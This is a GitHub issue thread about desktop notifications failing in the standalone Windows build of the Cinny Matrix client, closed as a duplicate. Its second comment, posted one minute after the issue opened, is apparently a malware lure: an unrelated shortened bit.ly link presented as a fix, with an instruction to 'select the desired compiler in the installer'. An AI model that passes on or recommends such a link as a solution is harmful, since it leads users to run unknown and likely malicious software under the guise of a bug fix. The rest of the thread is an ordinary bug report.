### ISSUE TITLE
Notifications do not work at all on Windows standalone version

### ISSUE THREAD

**Issue by Azure-Lazuline** [ajbura/cinny#1924] opened 2024-09-03 00:48 UTC
### Describe the bug

In the settings menu, "Notifications" tab, the "Desktop notification - Request permission" button does nothing when clicked, and therefore notifications never appear no matter what other settings are toggled.

### Reproduction

1. Go to the settings menu on Windows 10 (and possibly 11)
2. Go to the "Notifications" tab
3. Click "Request permission" for desktop notifications
4. Nothing happens

### Expected behavior

The button should enable desktop notifications

### Platform and versions

```shell
OS: Windows 10
Cinny version: 4.1.0 (standalone, not in-browser)
Homeserver: Matrix.org
```

### Additional context

The problem anecdotally also appears to happen on Windows 11 according to my friend, but i can't verify that the exact same steps were taken.
Any other way of visually seeing that there's activity without the program being active would also solve the problem for me (e.g. if there were an icon in the tray that had a dot for new messages).

Edit: I had notifications pop up exactly twice after posting this, for the first time. It seems to be extremely sporadic instead of simply "it never works". Restarting my computer doesn't seem to affect it.

**Comment by zawa999** [comment] 2024-09-03 00:49
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by kfiven** [comment] 2024-09-27 12:13
Duplicate of https://github.com/cinnyapp/cinny-desktop/issues/360

**Closed as not planned by kfiven** 2024-09-27 12:13 UTC
